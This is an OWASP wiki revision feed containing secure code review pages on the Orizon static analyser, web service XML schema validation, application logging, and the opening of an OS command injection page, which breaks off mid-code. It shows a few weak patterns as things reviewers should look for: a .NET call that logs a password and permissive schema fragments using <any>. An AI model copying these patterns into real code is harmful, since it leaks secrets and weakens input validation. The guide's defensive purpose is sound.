 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Where the sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you can see, the Session object delegates the actual work to the SessionInfo objects and then collects the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, the SessionInfo objects are the ones that talk to the Orizon internals and perform the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is taken from the org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent from the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
This support is achieved through an intermediate file format that describes the source code and against which the security checks are applied. That format is XML. &lt;br /&gt;
&lt;br /&gt;
Before static analysis starts, the source code is translated into XML. Starting from version 1.0, each source file is translated into four XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variables tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time this document is written (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported; support for other programming languages will follow soon. &lt;br /&gt;
&lt;br /&gt;
The translation phase is requested by the org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is instantiated and its scan() method is invoked. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''             ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
scan() is an abstract method defined in the org.owasp.orizon.translator.DefaultTranslator class and declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class extending DefaultTranslator must implement this method, specifying how to scan the source file and build the ASTs. &lt;br /&gt;
&lt;br /&gt;
Aside from the scan() method, there are four abstract methods needed to create the XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called from the translate() method, which is implemented directly in the DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in+ &amp;quot;: scan has been failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when translate() is invoked on a language-specific translator, it calls back into the language-specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains, as a private field, a language-specific scanner holding the ASTs used to generate the input files. &lt;br /&gt;
&lt;br /&gt;
Consider the org.owasp.orizon.translator.java.JavaTranslator class, which is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class in the org.owasp.orizon.translator.java package; it uses the Sun JDK 6 Compiler API to scan a Java file, creating in-memory ASTs. The trees are created in the scan() method, implemented for the Java language as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occured while translate &amp;quot; + in + &amp;quot;: &amp;quot; +e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
===Statistical Gathering ===&lt;br /&gt;
To implement statistical information gathering, the DefaultTranslator abstract method statService() must be implemented. The following example shows JavaTranslator's implementation. Statistical information is stored in the JavaScanner object itself and retrieved via its getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''        ret = true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        // FileNotFoundException and UnsupportedEncodingException are&lt;br /&gt;
 '''        // subclasses of IOException, so a single handler covers them all;&lt;br /&gt;
 '''        // ret is set before the catch so a failure is not overwritten.&lt;br /&gt;
 '''        ret = log.error(&amp;quot;an exception occured: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
Anyone interested in the Owasp Orizon framework can use the following links:&lt;br /&gt;
* main page @ Owasp: [[:Category:OWASP_Orizon_Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforge.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can also drop a line to the Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Web_Services&amp;diff=61243</id>
		<title>Reviewing Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Web_Services&amp;diff=61243"/>
				<updated>2009-05-22T12:58:54Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reviewing Webservices and XML Payloads */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Reviewing Webservices and XML Payloads==&lt;br /&gt;
When reviewing webservices, one should focus first on the generic security controls that apply to any application. Webservices also have some unique controls that should be examined. &lt;br /&gt;
&lt;br /&gt;
===XML Schema : Input validation===&lt;br /&gt;
Schemas are used to ensure that the XML payload received is within defined and expected limits. They can be specific to a list of known good values or simply define length and type. Some XML applications do not have a schema implemented, which may mean input validation is performed downstream, or not at all. &lt;br /&gt;
&lt;br /&gt;
''Keywords''&lt;br /&gt;
 '''Namespace''': An XML namespace is a collection of XML elements and attributes identified by an Internationalised Resource Identifier (IRI). &lt;br /&gt;
&lt;br /&gt;
In a single document, elements may exist with the same name that were created by different entities.&lt;br /&gt;
&lt;br /&gt;
To distinguish between such different definitions with the same name, an XML Schema allows the concept of namespaces -  think Java packages :)&lt;br /&gt;
&lt;br /&gt;
The schema can specify a finite set of parameters: the parameters expected in the XML payload, along with the expected types and values of the payload data.&lt;br /&gt;
&lt;br /&gt;
The processContents attribute indicates how XML from other namespaces should be validated. When the processContents attribute is set to  '''lax''' or '''skip''', input validation is not performed for wildcard elements and attributes.&lt;br /&gt;
&lt;br /&gt;
The value of this attribute may be: &lt;br /&gt;
* '''strict''': The processor must find a declaration in the associated namespace and validate the XML against it. &lt;br /&gt;
* '''lax''': The processor attempts to validate the XML against its schema, but does not fail if no declaration is found. &lt;br /&gt;
* '''skip''': There is no attempt to validate the XML.&lt;br /&gt;
&lt;br /&gt;
 processContents=strict|lax|skip&lt;br /&gt;
&lt;br /&gt;
===Infinite Occurrences of an Element or Attribute===&lt;br /&gt;
The unbounded value can be used in an XML schema to specify that there is no maximum number of occurrences for a specific element. &lt;br /&gt;
&lt;br /&gt;
 maxOccurs= positive-Integer|unbounded&lt;br /&gt;
&lt;br /&gt;
Given that any number of elements can be supplied for an unbounded element, the web service can be attacked by supplying it with vast numbers of elements, leading to resource exhaustion.&lt;br /&gt;
&lt;br /&gt;
===Weak namespace, Global elements, the &amp;lt;any&amp;gt; element &amp;amp; SAX XML processors===&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;any&amp;gt; element can be used to make extensible documents, allowing documents to contain additional elements that are not declared in the main schema. The idea that an application can accept any number of parameters may be cause for alarm: it may lead to denial of service or, in the case of a SAX XML parser, legitimate values may even be overwritten. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;cloud&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;process&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;lastcall&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;&lt;br /&gt;
      '''&amp;lt;xs:any minOccurs=&amp;quot;0&amp;quot;/&amp;gt;'''&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;any&amp;gt; element here permits additional parameters to be added in an arbitrary manner. &lt;br /&gt;
&lt;br /&gt;
A namespace of ##any in the &amp;lt;any&amp;gt; element means the schema allows elements beyond what is explicitly defined in the schema, thereby reducing control on expected elements for a given request. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;xs:any namespace='##any' /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A schema that does not define restrictive element namespaces permits arbitrary elements to be included in a valid document, which may not be expected by the application. This may give rise to attacks, such as XML Injection, which consist of including tags which are not expected by the application.&lt;br /&gt;
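A reviewer can also verify that the service actually enforces its schema on every inbound payload. The sketch below uses the standard javax.xml.validation API; the PayloadValidator class name and file arguments are illustrative only:&lt;br /&gt;

```java
import java.io.File;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

public class PayloadValidator {
    // Hypothetical sketch: return true only if the payload validates
    // against the supplied W3C XML Schema.
    public static boolean isValid(File schemaFile, File payload) {
        try {
            SchemaFactory factory =
                SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            Schema schema = factory.newSchema(schemaFile);
            Validator validator = schema.newValidator();
            validator.validate(new StreamSource(payload));
            return true;
        } catch (Exception e) {
            // SAXException on invalid content, IOException on read failure:
            // either way, reject the payload.
            return false;
        }
    }
}
```

Rejecting anything that fails schema validation up front narrows the attack surface for the injection issues described above.&lt;br /&gt;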
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_Logging_Issues&amp;diff=60796</id>
		<title>Reviewing Code for Logging Issues</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_Logging_Issues&amp;diff=60796"/>
				<updated>2009-05-15T10:17:50Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Log Storage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
=== In Brief===&lt;br /&gt;
Logging is the recording of information into storage that details who performed what and when they did it (like an audit trail). This can also cover debug messages implemented during development, as well as any messages reflecting problems or states within the application. It should be an audit of everything that the business deems important to track about the application’s use. Logging provides a detective method to ensure that the other security mechanisms being used are performing correctly. &lt;br /&gt;
&lt;br /&gt;
There are three categories of logs: application, operating system, and security software. While the general principles are similar for all logging needs, the practices stated in this document are especially applicable to application logs.&lt;br /&gt;
&lt;br /&gt;
A good logging strategy should include log generation, storage, protection, analysis, and reporting.&lt;br /&gt;
&lt;br /&gt;
====Log Generation====&lt;br /&gt;
Logging should be performed at least for the following events:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Authentication''': Successful and unsuccessful attempts.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Authorization requests'''.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Data manipulation''': Any (CUD) Create, Update, Delete actions performed on the application.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Session activity''': Termination/Logout events.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The application should have the ability to detect and record possible malicious use, such as events that cause unexpected errors or defy the state model of the application, for example, users who attempt to get access to data that they shouldn’t, and incoming data that does not meet validation rules or has been tampered with. In general, it should detect any error condition which could not occur without an attempt by the user to circumvent the application logic.&lt;br /&gt;
Logging should give us the information required to form a proper audit trail of a user's actions.&lt;br /&gt;
&lt;br /&gt;
Leading on from this, the date/time at which actions were performed is useful, but make sure the application uses a clock synchronized to a common time source. Logging functionality should not log any personal or sensitive data pertaining to the user or function being recorded. For example, if your application accepts HTTP GET requests, the payload is in the URL, and logging the URL may therefore record sensitive data.&lt;br /&gt;
&lt;br /&gt;
Logging should follow best practice regarding data validation: maximum length of information, malicious characters, and so on.&lt;br /&gt;
We should ensure that logging functionality only logs messages of a reasonable length and that this length is enforced.&lt;br /&gt;
Never log user input directly; validate it first, then log. &lt;br /&gt;
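As a minimal sketch of the “validate, then log” rule, the wrapper below truncates over-long messages and neutralises CR/LF characters, which are commonly used for log forging. The SafeLogger class name and the 256-character limit are illustrative, not a standard:&lt;br /&gt;

```java
public final class SafeLogger {
    private static final int MAX_LEN = 256; // illustrative limit, not a standard value

    // Truncate over-long messages and replace CR/LF characters,
    // which attackers use to forge extra log entries.
    public static String sanitize(String input) {
        if (input == null) {
            return "";
        }
        String clean = input.replaceAll("[\\r\\n]", "_");
        if (clean.length() > MAX_LEN) {
            clean = clean.substring(0, MAX_LEN);
        }
        return clean;
    }

    public static void main(String[] args) {
        // A forged entry loses its embedded newline:
        System.out.println(sanitize("Joe\r\nFAKE ADMIN LOGIN")); // prints "Joe__FAKE ADMIN LOGIN"
    }
}
```

A wrapper of this shape enforces both the length limit and the character policy in one place, rather than at every call site.&lt;br /&gt;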
&lt;br /&gt;
====Log Storage====&lt;br /&gt;
In order to preserve log entries and keep the sizes of log files manageable, log rotation is recommended. Log rotation means closing a log file and opening a new one when the first file is considered to be either complete or becoming too big. Log rotation is typically performed according to a schedule (e.g. daily) or when a file reaches a certain size.&lt;br /&gt;
&lt;br /&gt;
====Log Protection====&lt;br /&gt;
Because logs contain records of user accounts and other sensitive information, they need to be protected from breaches of their confidentiality, integrity, and availability: the triad of information security.&lt;br /&gt;
&lt;br /&gt;
====Log Analysis and Reporting====&lt;br /&gt;
Log analysis is the study of log entries to identify events of interest or to suppress entries for insignificant events. Log reporting is the presentation of the results of log analysis. Although these are normally the responsibilities of the system administrator, an application must generate logs that are consistent and contain information that allows the administrator to prioritize the records. Logging should create an audit trail of system events, time stamped in GMT so as not to create confusion. In the course of a review, check that transactional events such as Create, Update, or Delete (CUD), business events such as data transfers, and security events are all logged.&lt;br /&gt;
&lt;br /&gt;
===Common open source logging solutions===&lt;br /&gt;
&lt;br /&gt;
Log4J:		 http://logging.apache.org/log4j/docs/index.html&lt;br /&gt;
&lt;br /&gt;
Log4net:	 http://logging.apache.org/log4net/&lt;br /&gt;
&lt;br /&gt;
Commons Logging: http://jakarta.apache.org/commons/logging/index.html&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In Tomcat (5.5), if no custom logger (such as Log4J) is defined, then everything is logged via Commons Logging and ultimately ends up in catalina.out.&lt;br /&gt;
catalina.out grows endlessly and does not recycle/rollover. Log4J provides “Rollover” functionality, which limits the size of the log. Log4J also gives the option to specify “appenders” which can redirect the log data to other destinations such as a port, syslog, or even a database or JMS. &lt;br /&gt;
&lt;br /&gt;
The parts of log4J which should be considered apart from the actual data being logged by the application are contained in the log4j.properties file: &lt;br /&gt;
&lt;br /&gt;
 #&lt;br /&gt;
 # Configures Log4j as the Tomcat system logger&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configure the logger to output info level messages into a rolling log file.&lt;br /&gt;
 #&lt;br /&gt;
 log4j.rootLogger=INFO, R&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # To continue using the &amp;quot;catalina.out&amp;quot; file (which grows forever),&lt;br /&gt;
 # comment out the above line and uncomment the next.&lt;br /&gt;
 #&lt;br /&gt;
 #log4j.rootLogger=ERROR, A1&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configuration for standard output (&amp;quot;catalina.out&amp;quot;).&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.A1=org.apache.log4j.ConsoleAppender&lt;br /&gt;
 log4j.appender.A1.layout=org.apache.log4j.PatternLayout&lt;br /&gt;
 #&lt;br /&gt;
 # Print the date in ISO 8601 format&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.A1.layout.ConversionPattern=%d [%t] %-5p %c - %m%n&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Configuration for a rolling log file (&amp;quot;tomcat.log&amp;quot;).&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R=org.apache.log4j.DailyRollingFileAppender&lt;br /&gt;
 log4j.appender.R.DatePattern='.'yyyy-MM-dd&lt;br /&gt;
 #&lt;br /&gt;
 # Edit the next line to point to your logs directory.&lt;br /&gt;
 # The last part of the name is the log file name.&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R.File=/usr/local/tomcat/logs/tomcat.log&lt;br /&gt;
 log4j.appender.R.layout=org.apache.log4j.PatternLayout&lt;br /&gt;
 #&lt;br /&gt;
 # Print the date in ISO 8601 format&lt;br /&gt;
 #&lt;br /&gt;
 log4j.appender.R.layout.ConversionPattern=%d [%t] %-5p %c - %m%n&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # Application logging options&lt;br /&gt;
 #&lt;br /&gt;
 #log4j.logger.org.apache=DEBUG&lt;br /&gt;
 #log4j.logger.org.apache=INFO&lt;br /&gt;
 #log4j.logger.org.apache.struts=DEBUG&lt;br /&gt;
 #log4j.logger.org.apache.struts=INFO&lt;br /&gt;
&lt;br /&gt;
==Vulnerable patterns examples for Logging==&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
The following are issues to look out for or to raise with the development/deployment team. Logging and auditing are detective methods of fraud prevention. They are much overlooked in the industry, which enables attackers to continue to attack or commit fraud without being detected. &lt;br /&gt;
&lt;br /&gt;
They cover Windows and .NET issues.&lt;br /&gt;
&lt;br /&gt;
'''Check that:'''&lt;br /&gt;
#Windows native log puts a timestamp on all log entries.&lt;br /&gt;
#GMT is set as the default time.&lt;br /&gt;
#The Windows operating system can be configured to use network timeservers.&lt;br /&gt;
#By default the event log will show the name of the computer that generated the event and the application in the source field of the viewer. Additional information such as request identifier, username, and destination should be included in the body of the error event. &lt;br /&gt;
#No sensitive or business critical information is sent to the application logs.&lt;br /&gt;
#Application logs are not located in the web root directory.&lt;br /&gt;
#Log policy allows different levels of log severity.&lt;br /&gt;
&lt;br /&gt;
===Writing to the Event Log===&lt;br /&gt;
In the course of reviewing .NET code, ensure that calls to the EventLog object do not log any confidential information. &lt;br /&gt;
&lt;br /&gt;
 EventLog.WriteEntry( &amp;quot;&amp;lt;password&amp;gt;&amp;quot;,EventLogEntryType.Information);&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
You can add events to the web server log or the Windows event log. For the web server log, use: &lt;br /&gt;
&lt;br /&gt;
 Response.AppendToLog(&amp;quot;Error in Processing&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
This is the common way of adding entries to the Windows event log. &lt;br /&gt;
&lt;br /&gt;
 Const EVENT_SUCCESS = 0&lt;br /&gt;
 Set objShell = Wscript.CreateObject(&amp;quot;Wscript.Shell&amp;quot;)&lt;br /&gt;
 objShell.LogEvent EVENT_SUCCESS, _&lt;br /&gt;
   &amp;quot;Payroll application successfully installed.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Note that all the previous bullets for ASP.NET are largely applicable to classic ASP as well. &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60240</id>
		<title>Reviewing Code for OS Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Reviewing_Code_for_OS_Injection&amp;diff=60240"/>
				<updated>2009-05-06T17:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Injection flaws allow attackers to pass malicious code through a web application to another subsystem. Depending on the subsystem, different types of injection attacks can be performed: &lt;br /&gt;
&lt;br /&gt;
RDBMS: SQL Injection&amp;lt;br&amp;gt;&lt;br /&gt;
Web browser/App server: script injection (e.g., XSS)&amp;lt;br&amp;gt;&lt;br /&gt;
OS shell: operating system command injection, i.e., calling external applications from your application.&lt;br /&gt;
&lt;br /&gt;
OS Commanding is one of the attack classes that fall into [http://www.webappsec.org/projects/threat/classes/os_commanding.shtml Injection Flaws]. In other classifications, it is placed in the [http://www.fortify.com/vulncat/index.html Input Validation and Representation] [[Category:FIXME|link not working]]category, the [[Top_10_2007-A2|OS Commanding]] threat class, or defined as the [http://cwe.mitre.org/data/definitions/77.html Failure to Sanitize Data into Control Plane] weakness and the [http://capec.mitre.org/data/definitions/6.html Argument Injection] attack pattern enumeration. OS Commanding happens when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or as arguments) without validation or proper escaping.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable code ==&lt;br /&gt;
Many developers believe text fields are the only areas for data validation. This is an incorrect assumption. Any external input must be validated: &lt;br /&gt;
&lt;br /&gt;
Text fields, list boxes, radio buttons, check boxes, cookies, HTTP header data, HTTP POST data, hidden fields, and parameter names and values. This is not an exhaustive list. &lt;br /&gt;
&lt;br /&gt;
“Process-to-process” or “entity-to-entity” communication must also be investigated. Any code that communicates with an upstream or downstream process and accepts input from it must be reviewed. &lt;br /&gt;
&lt;br /&gt;
All injection flaws are input-validation errors. The presence of an injection flaw is an indication of incorrect data validation on the input received from an external source outside the boundary of trust, which gets more blurred every year. &lt;br /&gt;
&lt;br /&gt;
Basically, for this type of vulnerability, we need to find all input streams into the application. These can come from a user’s browser, CLI, or fat client, but also from upstream processes that “feed” our application. &lt;br /&gt;
&lt;br /&gt;
An example would be to search the code base for the use of APIs or packages that are normally used for communication purposes. &lt;br /&gt;
&lt;br /&gt;
The '''java.io''', '''java.sql''', '''java.net''', '''java.rmi''', and '''javax.xml''' packages are all used for application communication. Searching for methods from those packages in the code base can yield results. A less “scientific” method is to search for common keywords such as “UserID”, “LoginID” or “Password”.&lt;br /&gt;
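As a rough sketch of such a search, the hypothetical helper below (not part of any guide tooling) walks a source tree and counts imports of these communication-related packages:&lt;br /&gt;

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class ApiFinder {
    // Packages commonly used for external communication (illustrative list).
    static final String[] SUSPECTS = { "java.io.", "java.net.", "java.sql.", "java.rmi." };

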